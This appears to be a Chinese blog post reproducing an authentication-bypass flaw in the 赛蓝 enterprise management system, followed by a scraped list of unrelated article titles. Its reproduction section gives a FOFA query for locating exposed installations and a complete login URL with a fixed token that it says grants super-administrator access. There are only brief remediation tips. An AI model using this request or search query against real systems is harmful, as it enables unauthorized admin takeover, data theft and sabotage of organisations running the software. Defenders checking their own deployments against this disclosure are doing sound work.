当前位置: 首页 > news >正文

赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现

0x01 产品简介

赛蓝企业管理系统是一款为企业提供全面管理解决方案的软件系统,它能够帮助企业实现精细化管理,提高效率,降低成本。系统集成了多种管理功能,包括但不限于项目管理、财务管理、采购管理、销售管理以及报表分析等,旨在为企业提供一站式的管理解决方案。该系统以先进的管理思想为引导,结合企业实际业务流程,通过信息化手段提升企业管理水平。

0x02 漏洞概述

赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。

0x03 复现环境

FOFA:body="www.cailsoft.com" || body="赛蓝企业管理系统"

0x04 漏洞复现

访问url

/AuthToken/Index?loginName=System&token=c94ad0c0aee8b1f23b138484f014131f

即可登录后台

0x05 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Redis1
  • vscode的json文件解析
  • Halcon学习之create_shape_model案例分解
  • TiDB系列之:使用Flink TiDB CDC Connector采集数据
  • Java中的Map(如果想知道Java中有关Map的知识点,那么只看这一篇就足够了!)
  • 【过题记录】 8.3
  • CTFHUB-SSRF-DNS重绑定 Bypass
  • [米联客-安路飞龙DR1-FPSOC] UDP通信篇连载-01 以太网协议介绍
  • ai web 1.0靶机漏洞渗透详解
  • 搭建个人的金融系统-----第一章,数据库设计
  • Arch Linux - 2-安装中文输入法
  • 解析 C# Dictionary 代码
  • Comfyui实例容器运行横向扩展
  • 【ROS 最简单教程 003/300】ROS 快速体验:Hello World
  • C# Where关键字
  • flask接收请求并推入栈
  • Java,console输出实时的转向GUI textbox
  • leetcode378. Kth Smallest Element in a Sorted Matrix
  • Python进阶细节
  • 持续集成与持续部署宝典Part 2:创建持续集成流水线
  • 分享自己折腾多时的一套 vue 组件 --we-vue
  • 好的网址,关于.net 4.0 ,vs 2010
  • 基于游标的分页接口实现
  • 每天10道Java面试题,跟我走,offer有!
  • 【运维趟坑回忆录 开篇】初入初创, 一脸懵
  • Nginx实现动静分离
  • 交换综合实验一
  • ​2021半年盘点,不想你错过的重磅新书
  • ‌移动管家手机智能控制汽车系统
  • # Apache SeaTunnel 究竟是什么?
  • # centos7下FFmpeg环境部署记录
  • # Swust 12th acm 邀请赛# [ A ] A+B problem [题解]
  • ### Cause: com.mysql.jdbc.exceptions.jdbc4.MySQLTr
  • #每天一道面试题# 什么是MySQL的回表查询
  • $分析了六十多年间100万字的政府工作报告,我看到了这样的变迁
  • (~_~)
  • (AngularJS)Angular 控制器之间通信初探
  • (Repost) Getting Genode with TrustZone on the i.MX
  • (附源码)ssm捐赠救助系统 毕业设计 060945
  • (数位dp) 算法竞赛入门到进阶 书本题集
  • (四)事件系统
  • (转)C#调用WebService 基础
  • (转)es进行聚合操作时提示Fielddata is disabled on text fields by default
  • (转)Unity3DUnity3D在android下调试
  • (自适应手机端)响应式服装服饰外贸企业网站模板
  • .bat批处理(六):替换字符串中匹配的子串
  • .bat批处理(十一):替换字符串中包含百分号%的子串
  • .locked1、locked勒索病毒解密方法|勒索病毒解决|勒索病毒恢复|数据库修复
  • .NET 6 Mysql Canal (CDC 增量同步,捕获变更数据) 案例版
  • .net core 6 redis操作类
  • .NET Core 版本不支持的问题
  • .net FrameWork简介,数组,枚举
  • .Net Remoting常用部署结构
  • .net websocket 获取http登录的用户_如何解密浏览器的登录密码?获取浏览器内用户信息?...
  • .NET 给NuGet包添加Readme